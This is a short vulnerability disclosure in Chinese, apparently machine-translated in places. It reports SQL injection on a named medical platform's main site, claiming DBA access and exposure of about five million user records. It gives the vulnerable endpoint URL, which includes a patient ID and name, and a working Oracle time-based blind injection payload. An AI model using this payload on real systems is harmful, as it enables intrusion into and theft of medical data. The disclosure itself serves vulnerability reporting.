智慧医疗安全之云信医疗主站SQL注入/DBA权限/涉及近500W+用户数据

漏洞标题 智慧医疗安全之云信医疗主站SQL注入/DBA权限/涉及近500W+用户数据 相关厂商 jkwin.com.cn 漏洞作者 路人甲 提交时间 2016-06-06 20:13 公开时间 201…

从对等方接收数据时失败 Referer的:http://www.jkwin.com.cn/ystpatient2.3/callR.do?method=getQuery&true=doJsonp_f4bc5edb_8efe_4724_9b24_62ce7b52b552&patientId=5577546766&patientName=%E8%8B%8F%E8%81%94&functionName=doJsonp_f4bc5edb_8efe_4724_9b24_62ce7b52b552& _=1465190257502 主持人: www.jkwin.com.cn 连接:保持活动状态 Accept-Encoding: gzip,deflate 接受: */* 有效负载:(延迟3秒,请注意会话在验证时到期) 1'AND 2452=DBMS_PIPE.RECEIVE_MESSAGE(CHR(117)|| CHR(102)|| CHR(98)|| CHR(108),3)AND'UisK'='UisK 漏洞证明: 1,当前数据库用户,ROOT

2,所有数据库,共29个

3,与主站数据库相同,引用wooyun-2016-0214867的表数据来说明危险,涉及近500W +用户数据,具体不深

修理计划: 请多指教〜 版权声明:请注明出处。居民A @乌云